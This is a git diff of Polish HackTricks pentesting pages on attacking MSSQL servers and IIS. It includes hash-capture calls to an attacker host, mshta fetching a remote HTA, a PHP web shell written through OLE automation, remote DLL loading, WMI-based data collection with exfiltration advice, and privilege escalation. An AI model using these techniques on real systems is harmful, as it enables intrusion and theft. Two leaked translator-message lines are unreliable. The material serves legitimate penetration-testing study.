- **model Database**: Służy jako szablon dla każdej nowej bazy danych na instancji SQL Server — wszelkie zmiany, takie jak rozmiar, collation, recovery model i inne, są odzwierciedlane w nowo tworzonych bazach.
- **Resource Database**: Baza tylko do odczytu, która zawiera obiekty systemowe dostarczane z SQL Server. Obiekty te, choć fizycznie przechowywane w Resource database, są logicznie prezentowane w schemacie sys każdej bazy danych.
- **tempdb Database**: Służy jako obszar tymczasowego przechowywania dla obiektów ulotnych lub pośrednich zbiorów wyników.
## Enumeracja
## Enumeration
### Automatyczna enumeracja
### Automatic Enumeration
Jeśli nie wiesz nic o usłudze:
If you don't know anything about the service:
```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
```
> [!TIP]
> Jeśli **nie masz** **poświadczeń**, możesz spróbować je odgadnąć. Możesz użyć nmap lub metasploit. Uważaj, możesz **zablokować konta**, jeśli kilkakrotnie nieudanie zalogujesz się przy użyciu istniejącej nazwy użytkownika.
> Jeśli **nie** **masz credentials**, możesz spróbować je odgadnąć. Możesz użyć nmap lub metasploit. Uważaj — możesz **zablokować konta**, jeśli kilka razy nieudanie wykonasz login przy użyciu istniejącego username.
#### Metasploit (potrzebne poświadczenia)
#### Metasploit (need creds)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
@ -102,7 +102,7 @@ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
1> select 1;
2> go
```
#### Powszechna enumeracja
#### Typowa enumeracja
```sql
# Get version
select @@version;
@ -129,7 +129,7 @@ enum_links
#Use a link
use_link [NAME]
```
#### Uzyskaj użytkownika
#### Pobierz użytkownika
{{#ref}}
@ -154,16 +154,18 @@ order by name;
EXEC sp_helpuser
SELECT * FROM sysusers
```
#### Uzyskiwanie uprawnień
#### Uzyskaj uprawnienia
1. **Securable:** Zdefiniowane jako zasoby zarządzane przez SQL Server w celu kontroli dostępu. Są one klasyfikowane na:
- **Serwer** Przykłady obejmują bazy danych, loginy, punkty końcowe, grupy dostępności i role serwera.
- **Baza danych** Przykłady obejmują rolę bazy danych, role aplikacji, schemat, certyfikaty, katalogi pełnotekstowe i użytkowników.
- **Schemat** Obejmuje tabele, widoki, procedury, funkcje, synonimy itp.
2. **Uprawnienie:** Powiązane z securables SQL Server, uprawnienia takie jak ALTER, CONTROL i CREATE mogą być przyznawane podmiotowi. Zarządzanie uprawnieniami odbywa się na dwóch poziomach:
- **Poziom serwera** przy użyciu loginów
- **Poziom bazy danych** przy użyciu użytkowników
3. **Podmiot:** Termin ten odnosi się do podmiotu, któremu przyznano uprawnienia do securable. Podmioty obejmują głównie loginy i użytkowników bazy danych. Kontrola dostępu do securables odbywa się poprzez przyznawanie lub odmawianie uprawnień lub poprzez włączanie loginów i użytkowników do ról wyposażonych w prawa dostępu.
1. **Obiekt zabezpieczany (Securable):** Zdefiniowany jako zasoby zarządzane przez SQL Server w celu kontroli dostępu. Są one kategoryzowane na:
- **Serwer** przykłady obejmują bazy danych, loginy, endpoints, availability groups oraz role serwera.
- **Baza danych** przykłady obejmują role bazy danych, application roles, schemat, certyfikaty, katalogi pełnotekstowe (full text catalogs) oraz użytkowników.
- **Schemat** obejmuje tabele, widoki, procedury, funkcje, synonimy itd.
2. **Uprawnienie (Permission):** Powiązane z obiektami zabezpieczanymi SQL Server, uprawnienia takie jak ALTER, CONTROL i CREATE mogą być nadawane principal. Zarządzanie uprawnieniami odbywa się na dwóch poziomach:
- **Poziom serwera (Server Level)** przy użyciu loginów
- **Poziom bazy danych (Database Level)** przy użyciu użytkowników
3. **Principal:** Termin ten odnosi się do podmiotu, któremu przyznano uprawnienia do obiektu zabezpieczanego. Principalami są głównie loginy i użytkownicy bazy danych. Kontrolę dostępu do obiektów zabezpieczanych realizuje się poprzez nadawanie lub odmawianie uprawnień albo przez umieszczanie loginów i użytkowników w rolach posiadających prawa dostępu.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
@ -183,12 +185,12 @@ SELECT IS_SRVROLEMEMBER('sysadmin');
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
## Sztuczki
## Triki
### Wykonywanie poleceń systemu operacyjnego
> [!OSTRZEŻENIE]
> Zauważ, że aby móc wykonywać polecenia, nie tylko konieczne jest, aby **`xp_cmdshell`** było **włączone**, ale także posiadanie **uprawnienia EXECUTE do procedury składowanej `xp_cmdshell`**. Możesz sprawdzić, kto (oprócz sysadminów) może używać **`xp_cmdshell`** za pomocą:
> [!CAUTION]
> Zwróć uwagę, że aby móc wykonywać polecenia, nie wystarczy, że **`xp_cmdshell`** jest **włączony** — konieczne jest także posiadanie **uprawnienia EXECUTE do procedury składowanej `xp_cmdshell`**. Możesz sprawdzić, kto (oprócz sysadmins) może używać **`xp_cmdshell`** za pomocą:
>
> ```sql
> Use master
@ -235,13 +237,45 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
```
### Uzyskaj zhaszowane hasła
### Zdalne gromadzenie danych SQL oparte na WMI (sqlcmd + CSV export)
Operatorzy mogą przemieszczać się z warstwy IIS/app do SQL Servers, używając WMI do uruchomienia małego pliku batch, który uwierzytelnia się w MSSQL i wykonuje zapytania adhoc, eksportując wyniki do CSV. Dzięki temu zbieranie danych pozostaje proste i wtapia się w aktywność administratora.
Przykład mssq.bat
```bat
@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"
```
Wywołaj to zdalnie przy użyciu WMI
```cmd
wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
```
Alternatywa dla PowerShell
```powershell
$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd
```
Uwagi
- sqlcmd może być nieobecny; użyj w zamian osql, PowerShell Invoke-Sqlcmd lub jednowierszowego polecenia używającego System.Data.SqlClient.
- Używaj cytowania ostrożnie; długie/złożone zapytania łatwiej dostarczyć przez plik lub argument zakodowany w Base64 i dekodowany wewnątrz stubu batch/PowerShell.
- Eksfiltruj CSV przez SMB (np. skopiuj z \\SQLHOST\C$\Windows\Temp) lub skompresuj i przenieś przez swój C2.
### Pobierz hashe haseł
```bash
SELECT * FROM master.sys.syslogins;
```
### Kradzież hasha NetNTLM / Atak Relay
### Steal NetNTLM hash / Relay attack
Powinieneś uruchomić **serwer SMB**, aby przechwycić hash używany w uwierzytelnieniu (`impacket-smbserver` lub `responder` na przykład).
Uruchom **SMB server**, aby przechwycić hash używany w uwierzytelnianiu (`impacket-smbserver` lub `responder` na przykład).
```bash
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
@ -274,24 +308,26 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25
> EXEC sp_helprotect 'xp_fileexist';
> ```
Używając narzędzi takich jak **responder** lub **Inveigh**, możliwe jest **ukradzenie hasha NetNTLM**.\
Korzystając z narzędzi takich jak **responder** lub **Inveigh** możliwe jest **wykradzenie hasha NetNTLM**.\
Możesz zobaczyć, jak używać tych narzędzi w:
{{#ref}}
../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Wykorzystywanie zaufanych linków MSSQL
### Nadużywanie zaufanych łączy MSSQL
[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **aby znaleźć więcej informacji o tym, jak wykorzystać tę funkcję:**
[**Przeczytaj ten post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **aby znaleźć więcej informacji na temat wykorzystywania tej funkcji:**
{{#ref}}
../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md
{{#endref}}
### **Zapisz pliki**
### **Zapis plików**
Aby zapisać pliki za pomocą `MSSQL`, **musimy włączyć** [**Procedury automatyzacji Ole**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), co wymaga uprawnień administratora, a następnie wykonać kilka procedur składowanych, aby utworzyć plik:
Aby zapisać pliki za pomocą `MSSQL`, musimy **włączyć** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), co wymaga uprawnień administratora, a następnie wykonać kilka procedur składowanych, aby utworzyć plik:
```bash
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
@ -309,9 +345,9 @@ EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
```
### **Odczytaj plik za pomocą** OPENROWSET
### **Odczyt pliku za pomocą** OPENROWSET
Domyślnie `MSSQL` pozwala na odczyt pliku **z dowolnego pliku w systemie operacyjnym, do którego konto ma dostęp do odczytu**. Możemy użyć następującego zapytania SQL:
Domyślnie `MSSQL` pozwala na **odczyt dowolnego pliku w systemie operacyjnym, do którego konto ma uprawnienia odczytu**. Możemy użyć następującego zapytania SQL:
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
@ -324,15 +360,15 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTE
```
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
### **RCE/Odczyt plików wykonujących skrypty (Python i R)**
### **RCE/Read files executing scripts (Python and R)**
MSSQL może pozwolić na wykonanie **skryptów w Pythonie i/lub R**. Ten kod będzie wykonywany przez **innego użytkownika** niż ten, który używa **xp_cmdshell** do wykonywania poleceń.
MSSQL może pozwolić na uruchamianie **skryptów w Python i/lub R**. Ten kod będzie wykonywany przez **innego użytkownika** niż ten używający **xp_cmdshell** do wykonywania poleceń.
Przykład próby wykonania **'R'** _"Hellow World!"_ **nie działa**:
Przykład próby uruchomienia **'R'** _"Hellow World!"_ **nie działa**:
![](<../../images/image (393).png>)
Przykład użycia skonfigurowanego Pythona do wykonania kilku działań:
Przykład użycia skonfigurowanego Python do wykonania kilku działań:
```sql
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
@ -348,9 +384,9 @@ GO
```
### Odczyt rejestru
Microsoft SQL Server udostępnia **wiele rozszerzonych procedur składowanych**, które pozwalają na interakcję nie tylko z siecią, ale także z systemem plików, a nawet z [**rejestrem systemu Windows**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
Microsoft SQL Server udostępnia **wiele rozszerzonych procedur składowanych**, które pozwalają na interakcję nie tylko z siecią, ale także z systemem plików, a nawet z [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
| **Zwykłe** | **Świadome instancji** |
| **Standardowe** | **Zależne od instancji** |
| --------------------------- | ------------------------------------ |
| sys.xp_regread | sys.xp_instance_regread |
| sys.xp_regenumvalues | sys.xp_instance_regenumvalues |
@ -371,21 +407,21 @@ Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```
Dla **więcej przykładów** sprawdź [**oryginalne źródło**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
Aby uzyskać **więcej przykładów**, zobacz [**oryginalne źródło**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
### RCE z użyciem funkcji zdefiniowanej przez użytkownika MSSQL - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
### RCE z MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
Możliwe jest **załadowanie pliku .NET dll w MSSQL za pomocą funkcji niestandardowych**. Wymaga to jednak **dostępu `dbo`**, więc potrzebujesz połączenia z bazą danych **jako `sa` lub rola Administratora**.
Możliwe jest **załadowanie .NET dll w MSSQL przy użyciu custom functions**. Wymaga to jednak **dostępu `dbo`**, więc potrzebne jest połączenie z bazą danych **jako `sa` lub w roli Administratora**.
[**Śledź ten link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp), aby zobaczyć przykład.
Zobacz przykład, klikając [**ten link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp).
### RCE z `autoadmin_task_agents`
Zgodnie z [**tym postem**](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp), możliwe jest również załadowanie zdalnego dll i sprawienie, by MSSQL go wykonał za pomocą czegoś takiego:
Zgodnie z [**tym postem**](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp), możliwe jest również załadowanie zdalnej dll i zmuszenie MSSQL do jej wykonania za pomocą czegoś takiego:
```sql
update autoadmin_task_agents set task_assembly_name = "class.dll", task_assembly_path="\\remote-server\\ping.dll",className="Class1.Class1";
```
I'm sorry, but it seems that you haven't provided any text to translate. Please provide the content you would like me to translate to Polish.
Proszę wklej zawartość (lub fragment) pliku src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md, którą mam przetłumaczyć na polski.
```csharp
using Microsoft.SqlServer.SmartAdmin;
using System;
@ -437,13 +473,13 @@ public void Test()
```
### Inne sposoby na RCE
Istnieją inne metody uzyskania wykonania poleceń, takie jak dodawanie [rozszerzonych procedur składowanych](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [Zestawów CLR](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [Zadań agenta SQL Server](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15) oraz [skryptów zewnętrznych](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
Istnieją inne metody uzyskania wykonania poleceń, takie jak dodanie [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), oraz [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
## Eskalacja uprawnień MSSQL
## MSSQL Privilege Escalation
### Z db_owner do sysadmin
Jeśli **zwykły użytkownik** otrzyma rolę **`db_owner`** w **bazie danych należącej do użytkownika admina** (takiego jak **`sa`**) i ta baza danych jest skonfigurowana jako **`trustworthy`**, ten użytkownik może nadużyć tych uprawnień do **privesc**, ponieważ **procedury składowane** utworzone tam mogą **wykonywać** się jako właściciel (**admin**).
Jeśli **zwykłemu użytkownikowi** nadano rolę **`db_owner`** nad **bazą danych należącą do użytkownika administratora** (np. **`sa`**) i ta baza jest skonfigurowana jako **`trustworthy`**, użytkownik może nadużyć tych uprawnień, aby dokonać **privesc**, ponieważ **procedury składowane** utworzone w tej bazie mogą **wykonywać się** jako właściciel (**administrator**).
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
@ -481,7 +517,7 @@ Możesz użyć modułu **metasploit**:
```bash
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
```
Lub skrypt **PS**:
Albo skrypt **PS**:
```bash
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
@ -489,7 +525,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
```
### Podszywanie się pod innych użytkowników
SQL Server ma specjalne uprawnienie, nazwane **`IMPERSONATE`**, które **pozwala wykonującemu użytkownikowi przyjąć uprawnienia innego użytkownika** lub logowania, aż kontekst zostanie zresetowany lub sesja się zakończy.
SQL Server ma specjalne uprawnienie o nazwie **`IMPERSONATE`**, które **pozwala wykonującemu użytkownikowi przyjąć uprawnienia innego użytkownika** lub loginu, dopóki kontekst nie zostanie zresetowany lub sesja się nie zakończy.
```sql
# Find users you can impersonate
SELECT distinct b.name
@ -510,9 +546,9 @@ enum_links
use_link [NAME]
```
> [!TIP]
> Jeśli możesz podszyć się pod użytkownika, nawet jeśli nie jest on sysadminem, powinieneś sprawdzić, **czy użytkownik ma dostęp** do innych **baz danych** lub powiązanych serwerów.
> Jeśli możesz impersonate a user, nawet jeśli nie jest sysadmin, powinieneś sprawdzić **czy użytkownik ma dostęp** do innych **databases** lub linked servers.
Zauważ, że gdy już jesteś sysadminem, możesz podszyć się pod każdego innego:
Zauważ, że gdy już jesteś sysadmin, możesz impersonate dowolnego innego:
```sql
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
@ -532,32 +568,32 @@ lub za pomocą skryptu **PS**:
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
```
## Używanie MSSQL do utrzymania
## Używanie MSSQL do Persistence
[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
## Ekstrakcja haseł z powiązanych serwerów SQL Server
## Wyodrębnianie haseł z SQL Server Linked Servers
Atakujący może wyodrębnić hasła powiązanych serwerów SQL Server z instancji SQL i uzyskać je w postaci czystego tekstu, co daje atakującemu hasła, które mogą być użyte do zdobycia większej kontroli nad celem. Skrypt do ekstrakcji i deszyfrowania haseł przechowywanych dla powiązanych serwerów można znaleźć [tutaj](https://www.richardswinbank.net/admin/extract_linked_server_passwords)
Atakujący może wyodrębnić hasła SQL Server Linked Servers z instancji SQL i uzyskać je w postaci tekstu jawnego, co daje możliwość zdobycia większej pozycji na celu. Skrypt do wyodrębnienia i odszyfrowania haseł przechowywanych dla Linked Servers można znaleźć [here](https://www.richardswinbank.net/admin/extract_linked_server_passwords)
Muszą być spełnione pewne wymagania i konfiguracje, aby ten exploit działał. Przede wszystkim musisz mieć prawa administratora na maszynie lub możliwość zarządzania konfiguracjami SQL Server.
Aby exploit zadziałał, należy spełnić pewne wymagania i wprowadzić konfiguracje. Przede wszystkim musisz mieć prawa Administratora na maszynie lub możliwość zarządzania konfiguracją SQL Server.
Po zweryfikowaniu swoich uprawnień musisz skonfigurować trzy rzeczy, które są następujące:
Po potwierdzeniu uprawnień, trzeba skonfigurować trzy rzeczy, które są następujące:
1. Włącz TCP/IP na instancjach SQL Server;
2. Dodaj parametr uruchamiania, w tym przypadku zostanie dodany znacznik śledzenia, który wynosi -T7806.
3. Włącz zdalne połączenie administracyjne.
1. Włącz TCP/IP na instancjach SQL Server;
2. Dodać parametr Start Up — w tym przypadku zostanie dodany trace flag -T7806.
3. Włączyć remote admin connection.
Aby zautomatyzować te konfiguracje, [to repozytorium](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) zawiera potrzebne skrypty. Oprócz posiadania skryptu PowerShell dla każdego kroku konfiguracji, repozytorium zawiera również pełny skrypt, który łączy skrypty konfiguracyjne oraz ekstrakcję i deszyfrowanie haseł.
Aby zautomatyzować te konfiguracje, [this repository ](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) zawiera potrzebne skrypty. Oprócz skryptu powershell dla każdego kroku konfiguracji, repozytorium ma też pełny skrypt łączący skrypty konfiguracyjne oraz wyodrębnianie i odszyfrowanie haseł.
Aby uzyskać więcej informacji, zapoznaj się z następującymi linkami dotyczącymi tego ataku: [Deszyfrowanie haseł serwera powiązanego bazy danych MSSQL](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
Dla dalszych informacji, zobacz poniższe linki dotyczące tego ataku: [Decrypting MSSQL Database Link Server Passwords](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
[Rozwiązywanie problemów z dedykowanym połączeniem administracyjnym SQL Server](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
[Troubleshooting the SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
## Lokalna eskalacja uprawnień
Użytkownik uruchamiający serwer MSSQL będzie miał włączony token uprawnień **SeImpersonatePrivilege.**\
Prawdopodobnie będziesz mógł **eskalować do Administratora** postępując zgodnie z jedną z tych 2 stron:
Użytkownik uruchamiający MSSQL server będzie miał włączony token uprawnień **SeImpersonatePrivilege.**\
Prawdopodobnie będziesz w stanie **eskalować do Administratora** postępując według jednej z tych 2 stron:
{{#ref}}
@ -573,7 +609,19 @@ Prawdopodobnie będziesz mógł **eskalować do Administratora** postępując zg
- `port:1433 !HTTP`
## Odnośniki
## Źródła
- [Unit 42 Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
- [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
- [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
- [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
- [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
- [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
- [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
- [https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
- [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
- [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
@ -585,7 +633,7 @@ Prawdopodobnie będziesz mógł **eskalować do Administratora** postępując zg
- [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
- [https://exploit7-tr.translate.goog/posts/sqlserver/?\_x_tr_sl=es&\_x_tr_tl=en&\_x_tr_hl=en&\_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
## Automatyczne polecenia HackTricks
## HackTricks — Automatyczne polecenia
```
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.

228
src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
Testuj rozszerzenia plików wykonywalnych:
Przetestuj następujące rozszerzenia plików wykonywalnych:
- asp
- aspx
@ -11,7 +11,7 @@ Testuj rozszerzenia plików wykonywalnych:
## Ujawnienie wewnętrznego adresu IP
Na każdym serwerze IIS, na którym otrzymujesz 302, możesz spróbować usunąć nagłówek Host i użyć HTTP/1.0, a w odpowiedzi nagłówek Location może wskazywać na wewnętrzny adres IP:
Na dowolnym serwerze IIS, na którym otrzymujesz 302, możesz spróbować usunąć nagłówek Host i użyć HTTP/1.0 w odpowiedzi nagłówek Location może wskazywać adres IP wewnętrzny:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
@ -29,19 +29,19 @@ X-FEServer: NHEXCHANGE2016
```
## Wykonywanie plików .config
Możesz przesyłać pliki .config i używać ich do wykonywania kodu. Jednym ze sposobów jest dodanie kodu na końcu pliku wewnątrz komentarza HTML: [Pobierz przykład tutaj](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
Możesz przesyłać pliki .config i używać ich do wykonywania kodu. Jednym ze sposobów jest dołączenie kodu na końcu pliku wewnątrz komentarza HTML: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
Więcej informacji i technik wykorzystania tej podatności [tutaj](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
Więcej informacji i technik wykorzystania tej podatności [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## Bruteforce odkrywania IIS
## IIS Discovery Bruteforce
Pobierz listę, którą stworzyłem:
Download the list that I have created:
{{#file}}
iisfinal.txt
{{#endfile}}
Została stworzona poprzez połączenie zawartości następujących list:
It was created merging the contents of the following lists:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
@ -50,63 +50,63 @@ Została stworzona poprzez połączenie zawartości następujących list:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
Użyj jej bez dodawania jakiegoś rozszerzenia, pliki, które go potrzebują, już je mają.
Use it without adding any extension, the files that need it have it already.
## Przechodzenie po ścieżkach
## Path Traversal
### Wyciekanie kodu źródłowego
### Leaking source code
Sprawdź pełny opis w: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
> [!NOTE]
> Podsumowując, w folderach aplikacji znajduje się kilka plików web.config z odniesieniami do plików "**assemblyIdentity**" i "**namespaces**". Dzięki tym informacjom możliwe jest ustalenie **gdzie znajdują się pliki wykonywalne** i ich pobranie.\
> Z **pobranych Dll** można również znaleźć **nowe przestrzenie nazw**, do których powinieneś spróbować uzyskać dostęp i pobrać plik web.config, aby znaleźć nowe przestrzenie nazw i assemblyIdentity.\
> Ponadto pliki **connectionstrings.config** i **global.asax** mogą zawierać interesujące informacje.
> [!TIP]
> W skrócie, w folderach aplikacji znajduje się kilka plików web.config z odniesieniami do plików "**assemblyIdentity**" i "**namespaces**". Na podstawie tych informacji można ustalić **gdzie znajdują się pliki wykonywalne** i je pobrać.\
> Z **pobranych Dlls** można też znaleźć **nowe namespaces**, do których warto spróbować uzyskać dostęp i pobrać web.config, aby znaleźć kolejne namespaces i assemblyIdentity.\
> Również pliki **connectionstrings.config** i **global.asax** mogą zawierać interesujące informacje.
